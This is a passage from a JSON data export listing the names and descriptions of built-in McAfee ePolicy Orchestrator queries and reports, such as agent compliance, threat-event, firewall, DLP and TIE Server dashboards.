\t318,\\r\\n\\t\\t\\t319,\\r\\n\\t\\t\\t320,\\r\\n\\t\\t\\t379,\\r\\n\\t\\t\\t381,\\r\\n\\t\\t\\t383,\\r\\n\\t\\t\\t384,\\r\\n\\t\\t\\t385,\\r\\n\\t\\t\\t386,\\r\\n\\t\\t\\t387,\\r\\n\\t\\t\\t388\\r\\n\\t\\t]\"",
    "name": "\"[\\r\\n\\t\\t\\t\\\"Effective permissions for users\\\",\\r\\n\\t\\t\\t\\\"Permission set details\\\",\\r\\n\\t\\t\\t\\\"Permission set membership\\\",\\r\\n\\t\\t\\t\\\"Failed User Actions in ePO Console within Last 30 Days\\\",\\r\\n\\t\\t\\t\\\"Today's Detections per Product\\\",\\r\\n\\t\\t\\t\\\"Systems per Top-Level Group\\\",\\r\\n\\t\\t\\t\\\"Duplicate Systems Names\\\",\\r\\n\\t\\t\\t\\\"McAfee Agent Compliance Summary\\\",\\r\\n\\t\\t\\t\\\"McAfee Agent Compliance History\\\",\\r\\n\\t\\t\\t\\\"Multi-server McAfee Agent Compliance Summary\\\",\\r\\n\\t\\t\\t\\\"Multi-server McAfee Agent Compliance History\\\",\\r\\n\\t\\t\\t\\\"Repository Replication Trend for 2 Months\\\",\\r\\n\\t\\t\\t\\\"Failed logon Attempts in Last 30 Days\\\",\\r\\n\\t\\t\\t\\\"Successful logon Attempts in Last 30 Days\\\",\\r\\n\\t\\t\\t\\\"Server Configurations by User (30 days)\\\",\\r\\n\\t\\t\\t\\\"Software Configurations by user (30 days)\\\",\\r\\n\\t\\t\\t\\\"Configuration Changes by User (30 days)\\\",\\r\\n\\t\\t\\t\\\"Malware Detection History\\\",\\r\\n\\t\\t\\t\\\"Applied Policies for McAfee Agent \\\",\\r\\n\\t\\t\\t\\\"Applied Policies by Policy Name\\\",\\r\\n\\t\\t\\t\\\"Policy Assignment Change History by User (30 days)\\\",\\r\\n\\t\\t\\t\\\"Agent Versions Summary\\\",\\r\\n\\t\\t\\t\\\"Agent Communication Summary\\\",\\r\\n\\t\\t\\t\\\"Systems with High Sequence Errors\\\",\\r\\n\\t\\t\\t\\\"Systems with no Recent Sequence Errors\\\",\\r\\n\\t\\t\\t\\\"Unmanaged Systems\\\",\\r\\n\\t\\t\\t\\\"Software Manager Failed Installs\\\",\\r\\n\\t\\t\\t\\\"Policy Assignment Broken Inheritance\\\",\\r\\n\\t\\t\\t\\\"Applied Client Tasks\\\",\\r\\n\\t\\t\\t\\\"Client Task Assignment Broken Inheritance\\\",\\r\\n\\t\\t\\t\\\"Product Deployment in the Last 24 Hours\\\",\\r\\n\\t\\t\\t\\\"Agent Uninstalls Attempted in the Last 7 Days\\\",\\r\\n\\t\\t\\t\\\"Failed Product Deployment in the Last 24 Hours\\\",\\r\\n\\t\\t\\t\\\"Failed Product Updates in the Last 24 Hours\\\",\\r\\n\\t\\t\\t\\\"Product Updates in the Last 24 Hours\\\",\\r\\n\\t\\t\\t\\\"Distributed Repository Status\\\",\\r\\n\\t\\t\\t\\\"New Agents Added to ePO per Week\\\",\\r\\n\\t\\t\\t\\\"Most Numerous Threat Event Descriptions\\\",\\r\\n\\t\\t\\t\\\"Threat Events by System Tree Group\\\",\\r\\n\\t\\t\\t\\\"Threat Event Descriptions in the Last 24 Hours\\\",\\r\\n\\t\\t\\t\\\"Product Update Successes and Failures Trend for the last 2 Months\\\",\\r\\n\\t\\t\\t\\\"Inactive Agents\\\",\\r\\n\\t\\t\\t\\\"Systems per Agent Handler\\\",\\r\\n\\t\\t\\t\\\"Agent Handler Status\\\",\\r\\n\\t\\t\\t\\\"Threat Events in the Last 2 Weeks\\\",\\r\\n\\t\\t\\t\\\"Managed Nodes Having Point Product Policy Enforcement Failures\\\",\\r\\n\\t\\t\\t\\\"Managed Nodes Having Point Product Property Collection Failures\\\",\\r\\n\\t\\t\\t\\\"Repository Usage Based On DAT and Engine Pulling\\\",\\r\\n\\t\\t\\t\\\"Repositories and Percentage Utilization\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Compliance Status\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Web Content Categories that Caused the Most Infections in the Last 7 Days\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Hotfixes Installed\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Visits by Rating\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Visits by Content\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Downloads by Rating\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Top 100 Visited Red Sites\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Top 100 Visited Yellow Sites\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Top 100 Visited Unrated Sites\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Top 100 Blocked Red Sites\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Top 100 Warned-Continued Sites\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Top 100 Blocked Sites\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Top 100 Sites on Block List\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Top 100 Sites on Allow List\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Visit Log\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Downloads by Action\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Download Log\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Top 100 Red Sites on Allow List\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Top Sites Grouped by Content\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Top 100 Warned-Cancelled Sites\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Visits by Action\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Top 100 Red Downloads\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Top 100 Yellow Downloads\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Top 100 Unrated Downloads\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Visits by Action Grouped by Content\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Block Events for Last 30 Days\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Allow Events for Last 30 Days\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Clean Events for Last 30 Days\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Block Events by Event Type\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Allow Events by Event Type\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Clean Events by Event Type\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Observation Block Events for Last 30 Days\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Observation Allow Events for Last 30 Days\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Observation Clean Events for Last 30 Days\\\",\\r\\n\\t\\t\\t\\\"Failed User Actions in McAfee ePO Console within Last 30 Days\\\",\\r\\n\\t\\t\\t\\\"DLP: Number of Incidents per type (data in-use/in-motion)\\\",\\r\\n\\t\\t\\t\\\"DLP: Number of Incidents per rule set (data in-use/in-motion)\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security: Installation Status Report\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security: Threats Detected in the Last 24 Hours\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security: Threats Detected in the Last 7 Days\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security: Summary of Threats Detected in the Last 24 Hours\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security: Summary of Threats Detected in the Last 7 Days\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security: Primary Vectors of Attack in the Last 7 Days\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security: Top Infected Users in the Last 7 Days\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security: Top Threats in the Last 48 Hours\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security: Duration before Detection on Endpoints in the Last 2 Weeks\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security: Top 10 Attacking Systems in the Last 7 Days\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security: Currently Enabled Technology\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security: Self Protection Compliance Status\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security: Policy Compliance by Computer Name\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security: Policy Compliance by Policy Name\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Platform: Hotfixes Installed\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: Applications with the Most Exploits in the Last 7 Days\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: Duration of Completed Full Scans in the Last 7 Days\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: Duration of Completed Quick Scans in the Last 7 Days\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: Systems Not Completed a Full Scan in the Last 7 Days\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: Systems Not Completed a Full Scan in the Last Month\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: Access Protection Compliance Status\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: AMCore Content Compliance Status\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: Exploit Prevention Compliance Status\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: On-Access Scan Compliance Status\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: Content Status\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: Exploit Prevention Content Status\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: Detection Response Summary\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: Threats Detected Over the Previous 2 Quarters\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: Top 10 Computers with the Most Detections\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: Top 10 Detected Threats\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: Top 10 Access Protection Rules Broken\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: Threat Count by Severity\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: Top 10 Users with the Most Detections\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: Top 10 Threats Per Threat Category\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: Top 10 Threat Sources\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: Top 10 Exploits Prevented\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: Hotfixes Installed\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: On-Access Scan McAfee GTI Sensitivity Level\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: On-Demand Full Scan McAfee GTI Sensitivity Level\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: On-Demand Quick Scan McAfee GTI Sensitivity Level\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: Right-Click Scan McAfee GTI Sensitivity Level\\\",\\r\\n\\t\\t\\t\\\"DLP: Distribution of DLP products on endpoint computers\\\",\\r\\n\\t\\t\\t\\\"DLP Discovery (Endpoint): Local Email Storage Scan Current Status\\\",\\r\\n\\t\\t\\t\\\"DLP: Policy distribution\\\",\\r\\n\\t\\t\\t\\\"DLP: Enforced Rule Sets per endpoint computers\\\",\\r\\n\\t\\t\\t\\\"DLP: Bypassed users\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall: Intrusion events in the last 24 hours\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall: Events in the last 24 hours\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall: Events from McAfee GTI in the last 6 months\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall: Traffic block events in the last 24 hours\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall: Status\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall: Compliance Status\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall: Count of Firewall Client Rules\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall: Client Rules By Process/Port Range\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall: Client Rules By Process/User\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall: Client Rules By Process\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall: Client Rules By Protocol/System Name\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall: Errors\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall: Hotfixes Installed\\\",\\r\\n\\t\\t\\t\\\"TIE Server Cleanup Executions Deleting Items\\\",\\r\\n\\t\\t\\t\\\"TIE Server Cleanup Items Deleted By Week\\\",\\r\\n\\t\\t\\t\\\"TIE Server Most Used Suspicious Files\\\",\\r\\n\\t\\t\\t\\\"TIE Server Most Recently Used Suspicious Files\\\",\\r\\n\\t\\t\\t\\\"TIE Server Most Prevalent Suspicious Files Created\\\",\\r\\n\\t\\t\\t\\\"TIE Server Most Used Monitored Files\\\",\\r\\n\\t\\t\\t\\\"TIE Server Most Recently Used Monitored Files\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Observation Block Events by Event Type\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Observation Allow Events by Event Type\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Observation Clean Events by Event Type\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Block Events by Rule (Top 10)\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Observation Block Events by Rule (Top 10)\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Allow Events by Rule (Top 10)\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Observation Allow Events by Rule (Top 10)\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Clean Events by Rule (Top 10)\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Observation Clean Events by Rule (Top 10)\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Events by System (Top 10)\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Observation Events by System (Top 10)\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Events by File (Top 10)\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Observation Events by File (Top 10)\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: False Positive Mitigation Events\\\",\\r\\n\\t\\t\\t\\\"TIE Server Most Prevalent Monitored Files Created\\\",\\r\\n\\t\\t\\t\\\"Recently Used ATD Submissions\\\",\\r\\n\\t\\t\\t\\\"TIE Server Connectivity\\\",\\r\\n\\t\\t\\t\\\"TIE Server Appliances per Server Version\\\",\\r\\n\\t\\t\\t\\\"TIE Server Appliances per Agent Version\\\",\\r\\n\\t\\t\\t\\\"TIE Server Appliances per Platform Version\\\",\\r\\n\\t\\t\\t\\\"DLP Discovery (Endpoint): Local File System Scan Current Status\\\",\\r\\n\\t\\t\\t\\\"DLP Discovery (Endpoint): Local File System Scan Latest Status\\\",\\r\\n\\t\\t\\t\\\"DLP Discovery (Endpoint): Local File System Scan Latest Sensitive Files\\\",\\r\\n\\t\\t\\t\\\"DLP Discovery (Endpoint): Local File System Scan Latest Errors\\\",\\r\\n\\t\\t\\t\\\"DLP Discovery (Endpoint): Local File System Scan Latest Classifications\\\",\\r\\n\\t\\t\\t\\\"DLP Discovery (Endpoint): Local Email Scan Latest Status\\\",\\r\\n\\t\\t\\t\\\"DLP Discovery (Endpoint): Local Email Scan Latest Sensitive Files\\\",\\r\\n\\t\\t\\t\\\"DLP: Privileged Users\\\",\\r\\n\\t\\t\\t\\\"DLP: Chrome Support Summary\\\",\\r\\n\\t\\t\\t\\\"TIE Server New Certificates by GTI Reputation from Last Week\\\",\\r\\n\\t\\t\\t\\\"TIE Server Malicious or Unidentified Certificates by GTI Reputation from Last Month\\\",\\r\\n\\t\\t\\t\\\"TIE Server Certificates by Enterprise Reputation\\\",\\r\\n\\t\\t\\t\\\"Recently Used CTD Submissions\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security: Client Interface Logon Audit Log \\\",\\r\\n\\t\\t\\t\\\"Endpoint Security: Locked Client Systems Due to Failed Password Attempts\\\",\\r\\n\\t\\t\\t\\\"MCP: Endpoint Install Success/Failed events in last month\\\",\\r\\n\\t\\t\\t\\\"TIE Server Appliances per Broker Version\\\",\\r\\n\\t\\t\\t\\\"TIE Server Recently Used Overrides\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall: Events in the last 24 hours- copy\\\",\\r\\n\\t\\t\\t\\\"Security Incidents (last 14 days) \\\",\\r\\n\\t\\t\\t\\\"OS Distribution\\\",\\r\\n\\t\\t\\t\\\"Data Centers\\\",\\r\\n\\t\\t\\t\\\"Application Reputation\\\",\\r\\n\\t\\t\\t\\\"Anti-Malware Status\\\",\\r\\n\\t\\t\\t\\\"Host Firewall Status\\\",\\r\\n\\t\\t\\t\\\"File Integrity Monitoring Status\\\",\\r\\n\\t\\t\\t\\\"Boot Attestation Status of Hypervisors\\\",\\r\\n\\t\\t\\t\\\"AV protection by product \\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Report\\\",\\r\\n\\t\\t\\t\\\"Endpoint Scan Report\\\",\\r\\n\\t\\t\\t\\\"Security Incidents (last 14 days) \\\",\\r\\n\\t\\t\\t\\\"OS Distribution\\\",\\r\\n\\t\\t\\t\\\"Data Centers\\\",\\r\\n\\t\\t\\t\\\"Anti-Malware Status\\\",\\r\\n\\t\\t\\t\\\"File Integrity Monitoring Status\\\",\\r\\n\\t\\t\\t\\\"Instance Assessment Status\\\",\\r\\n\\t\\t\\t\\\"Host Firewall Status\\\",\\r\\n\\t\\t\\t\\\"vCenter Asset Management Report\\\",\\r\\n\\t\\t\\t\\\"TIE Server GTI Refresh\\\",\\r\\n\\t\\t\\t\\\"TIE Server Database Size\\\",\\r\\n\\t\\t\\t\\\"TIE Server New Files\\\",\\r\\n\\t\\t\\t\\\"TIE Server New Overrides\\\",\\r\\n\\t\\t\\t\\\"ATD Reputations\\\",\\r\\n\\t\\t\\t\\\"ATD Submissions\\\",\\r\\n\\t\\t\\t\\\"Most Prevalent ATD Submissions\\\",\\r\\n\\t\\t\\t\\\"New ATD Submissions\\\",\\r\\n\\t\\t\\t\\\"CTD Reputations\\\",\\r\\n\\t\\t\\t\\\"CTD Submissions\\\",\\r\\n\\t\\t\\t\\\"Most Prevalent CTD Submissions\\\",\\r\\n\\t\\t\\t\\\"New CTD Submissions\\\",\\r\\n\\t\\t\\t\\\"Redundant Trusted Overrides\\\",\\r\\n\\t\\t\\t\\\"Redundant Suspicious Overrides\\\",\\r\\n\\t\\t\\t\\\"Conflicting Suspicious Overrides\\\",\\r\\n\\t\\t\\t\\\"DLP: Number of Operational events per day\\\",\\r\\n\\t\\t\\t\\\"DLP: Agent Version\\\",\\r\\n\\t\\t\\t\\\"Conflicting Trusted Overrides\\\",\\r\\n\\t\\t\\t\\\"Unsigned Unknown Files\\\",\\r\\n\\t\\t\\t\\\"TIE Server Unsigned Unknown Files Usage\\\",\\r\\n\\t\\t\\t\\\"Unsigned Unknown Files by Company\\\",\\r\\n\\t\\t\\t\\\"Most Active Parents of Unknown Files\\\",\\r\\n\\t\\t\\t\\\"Most Monitored Unknown Files\\\",\\r\\n\\t\\t\\t\\\"Most Active Endpoints\\\",\\r\\n\\t\\t\\t\\\"Signed Unknown Files\\\",\\r\\n\\t\\t\\t\\\"Signed Unknown Files per Certificate Subject\\\",\\r\\n\\t\\t\\t\\\"Signed Unknown Files by Company\\\",\\r\\n\\t\\t\\t\\\"Signed Unknown Files by Product\\\",\\r\\n\\t\\t\\t\\\"DLP: Agent Status\\\",\\r\\n\\t\\t\\t\\\"DLP: Agent Operation mode\\\",\\r\\n\\t\\t\\t\\\"DLP: Operational events per type\\\",\\r\\n\\t\\t\\t\\\"DLP: Number of Incidents per day (data in-use/in-motion)\\\",\\r\\n\\t\\t\\t\\\"DLP: Number of Incidents per severity (data in-use/in-motion)\\\",\\r\\n\\t\\t\\t\\\"TIETest01\\\",\\r\\n\\t\\t\\t\\\"DLP Discovery (Endpoint): Local Email Scan Latest Errors\\\",\\r\\n\\t\\t\\t\\\"DLP Discovery (Endpoint): Local Email Scan Latest Classifications\\\",\\r\\n\\t\\t\\t\\\"DLP: Undefined Device Classes (for Windows Devices)\\\",\\r\\n\\t\\t\\t\\\"DLP: Policy revision distribution\\\",\\r\\n\\t\\t\\t\\\"DLP: Chrome unsupported versions \\\",\\r\\n\\t\\t\\t\\\"TIE Server Certificates with Changed GTI Reputation from Last Week\\\",\\r\\n\\t\\t\\t\\\"TIE Server Top 10 Systems with New Certificates from Last Week\\\",\\r\\n\\t\\t\\t\\\"TIE Server New Files by GTI Reputation from Last Week\\\",\\r\\n\\t\\t\\t\\\"TIE Server Malicious or Unidentified Files by GTI Reputation from Last Month\\\",\\r\\n\\t\\t\\t\\\"TIE Server Files by Enterprise Reputation\\\",\\r\\n\\t\\t\\t\\\"TIE Server Files with Changed GTI Reputation from Last Week\\\",\\r\\n\\t\\t\\t\\\"TIE Server Top 10 Systems with New Files from Last Week\\\",\\r\\n\\t\\t\\t\\\"TIE Server Cleanup Trending Summary\\\",\\r\\n\\t\\t\\t\\\"TIE Server Cleanup Criteria Effectiveness\\\",\\r\\n\\t\\t\\t\\\"TIE Server Used Malicious Files\\\",\\r\\n\\t\\t\\t\\\"TIE Server Most Recently Used Malicious Files\\\",\\r\\n\\t\\t\\t\\\"TIE Server Most Prevalent Malicious Files Created\\\",\\r\\n\\t\\t\\t\\\"Usage Metering Report\\\",\\r\\n\\t\\t\\t\\\"Data Protection Per Cloud VM\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Real Protect Detection Events in Last 24 Hours\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Real Protect Detection Events for Last 7 Days\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Real Protect Detection Events for Last 30 Days\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Real Protect Detection Events for Last Quarter\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Content Status\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Extra.DAT Signatures\\\"\\r\\n\\t\\t]\"",
    "description": "\"[\\r\\n\\t\\t\\t\\\"Shows all permissions for each user\\\",\\r\\n\\t\\t\\t\\\"Shows the permissions associated with each permission set\\\",\\r\\n\\t\\t\\t\\\"Shows the permission sets associated with each principal\\\",\\r\\n\\t\\t\\t\\\"Displays a table of all failed actions within the last 30 days from the Audit Log.\\\",\\r\\n\\t\\t\\t\\\"Displays a pie chart of detections within the last 24 hours organized by detecting product.\\\",\\r\\n\\t\\t\\t\\\"Displays a bar chart of your managed systems organized by top-level System Tree group.\\\",\\r\\n\\t\\t\\t\\\"Lists all system names that appear in multiple System Tree locations.\\\",\\r\\n\\t\\t\\t\\\"Displays a Boolean pie chart of managed systems in your environment which are compliant or noncompliant by version of McAfee Agent.\\\",\\r\\n\\t\\t\\t\\\"Displays the percentage of systems (over time) in your environment which are compliant. Uses the \\\\\\\"McAfee Agent Compliance Summary\\\\\\\" query to determine compliance. The \\\\\\\"Generate Records for McAfee Compliance History Reporting\\\\\\\" server task is used to record the daily compliance percentage.\\\",\\r\\n\\t\\t\\t\\\"Displays a Boolean pie chart of systems across all registered servers which are compliant or noncompliant by version of McAfee Agent.\\\",\\r\\n\\t\\t\\t\\\"Displays the percentage of systems (over time) across all registered server which are compliant.\\\",\\r\\n\\t\\t\\t\\\"Shows a multi-line chart with the total number of successful and unsuccessful replications per week for the last 2 months.\\\",\\r\\n\\t\\t\\t\\\"Displays a list grouped by user of all failed logon attempts in the last 30 days.\\\",\\r\\n\\t\\t\\t\\\"Displays a list grouped by user of all successful logon attempts in the last 30 days.\\\",\\r\\n\\t\\t\\t\\\"Displays a report grouped by user of all server configuration actions in the last 30 days as recorded in the Audit log.\\\",\\r\\n\\t\\t\\t\\\"Displays a report grouped by user of all software configuration actions in the last 30 days as recorded in the Audit Log.\\\",\\r\\n\\t\\t\\t\\\"Displays a report grouped by user of all actions considered configuration changes in the last 30 days as recorded in the Audit log.\\\",\\r\\n\\t\\t\\t\\\"Displays a line chart of the number of internal virus detections over the past quarter.\\\",\\r\\n\\t\\t\\t\\\"Displays a group summary table of all applied policies for McAfee agent grouped by category.\\\",\\r\\n\\t\\t\\t\\\"Displays a list of all applied policies and the number of times each policy has been applied.\\\",\\r\\n\\t\\t\\t\\\"Displays a report grouped by user of all policy assignments in the last 30 days as recorded in the Audit log.\\\",\\r\\n\\t\\t\\t\\\"Displays a pie chart of installed agents by version number on managed systems. Slice sizes indicate the relative number of agents of each version in the environment. Click any slice to view or take actions on those systems.\\\",\\r\\n\\t\\t\\t\\\"Displays a pie chart of managed systems indicating whether the agents have communicated with the ePO server within the past day. Click either slice to view or take actions on those systems.\\\",\\r\\n\\t\\t\\t\\\"Lists the systems with high sequence error counts. This could indicate a duplicate agent GUID problem.\\\",\\r\\n\\t\\t\\t\\\"Lists the systems with sequence errors older than 1 week. These systems probably do not have duplicate agent GUIDs and can have their error count reset.\\\",\\r\\n\\t\\t\\t\\\"List all unmanaged systems.\\\",\\r\\n\\t\\t\\t\\\"Lists all Software Manager failed installs.\\\",\\r\\n\\t\\t\\t\\\"Lists all points of broken inheritance for policy assignments other than My Organization. \\\",\\r\\n\\t\\t\\t\\\"List all applied client tasks grouped by product.\\\",\\r\\n\\t\\t\\t\\\"Lists all points in the tree where client task assignment inheritance has been broken, grouped by task name.\\\",\\r\\n\\t\\t\\t\\\"Displays a boolean pie chart of all product deployments in the last 24 hours. Successful deployments are shown in green.\\\",\\r\\n\\t\\t\\t\\\"Displays a single line chart grouped by day of all Agent uninstall client events in the last 7 days.\\\",\\r\\n\\t\\t\\t\\\"Displays a bar chart grouped by hour all the failed product deployments in the last 24 hours.\\\",\\r\\n\\t\\t\\t\\\"Displays a group bar chart grouped by hour of all failed product updates in the last 24 hours.\\\",\\r\\n\\t\\t\\t\\\"Displays a boolean pie chart off all product updates in the last 24 hours. Successful updates are shown in green.\\\",\\r\\n\\t\\t\\t\\\"Displays a Boolean pie chart of your distributed repositories, divided according to whether their last replication was successful.\\\",\\r\\n\\t\\t\\t\\\"Great query during a rollout or tracking the number of new agents showing up in ePO on daily, weekly or monthly basis.\\\",\\r\\n\\t\\t\\t\\\"Shows the most numerous threat events found.\\\",\\r\\n\\t\\t\\t\\\"This is a breakdown of threat events by where they reside in the system tree. The goal is to show an admin what groups are being hit with malware more than others are. This can help pinpoint where an organization needs to improve their security strategy.\\\",\\r\\n\\t\\t\\t\\\"Groups, totals, and charts the number of different threat events that occurred in the last 24 hours.\\\",\\r\\n\\t\\t\\t\\\"Shows multi-line chart of the total number of product updates successes and failures on a weekly basis for the last 2 months.\\\",\\r\\n\\t\\t\\t\\\"McAfee Agents that have not communicated with the ePolicy Orchestrator Server in the last 30 days.\\\",\\r\\n\\t\\t\\t\\\"Displays a pie chart of managed systems each slice representing an agent handler.\\\",\\r\\n\\t\\t\\t\\\"Agent handler communication status within the last hour.\\\",\\r\\n\\t\\t\\t\\\"This chart shows the trend of threat event generation for the last 2 weeks.\\\",\\r\\n\\t\\t\\t\\\"Displays a single group bar chart showing all managed nodes where policy enforcement is failing for at least one of the point products.\\\",\\r\\n\\t\\t\\t\\\"Displays a single group bar chart showing all managed nodes where property collection is failing for at least one of the point products.\\\",\\r\\n\\t\\t\\t\\\"Displays the amount of DAT and Engine pulling per repository. This query can help identify overloaded repositories that are causing bandwidth issues and necessary repository configuration improvements in policy.\\\",\\r\\n\\t\\t\\t\\\"Displays a pie chart indicating percentage utilization per repository. This query can help identify overloaded repositories that are causing bandwidth issues and necessary repository configuration improvements in policy.\\\",\\r\\n\\t\\t\\t\\\"This is the Web Control Compliance Status Report.\\\",\\r\\n\\t\\t\\t\\\"This report lists the Web Content Categories with the most infections in the last 7 days\\\",\\r\\n\\t\\t\\t\\\"Displays the hotfixes installed for Web Control.\\\",\\r\\n\\t\\t\\t\\\"Pie chart depicting number of visits over the last 30 days, grouped by site rating.\\\",\\r\\n\\t\\t\\t\\\"Pie chart depicting number of visits over the last 30 days, grouped by site content.\\\",\\r\\n\\t\\t\\t\\\"Pie chart depicting number of downloads over the last 30 days, grouped by file rating.\\\",\\r\\n\\t\\t\\t\\\"Top 100 red sites visited over the last 30 days.\\\",\\r\\n\\t\\t\\t\\\"Top 100 yellow sites visited over the last 30 days.\\\",\\r\\n\\t\\t\\t\\\"Top 100 unrated sites visited over the last 30 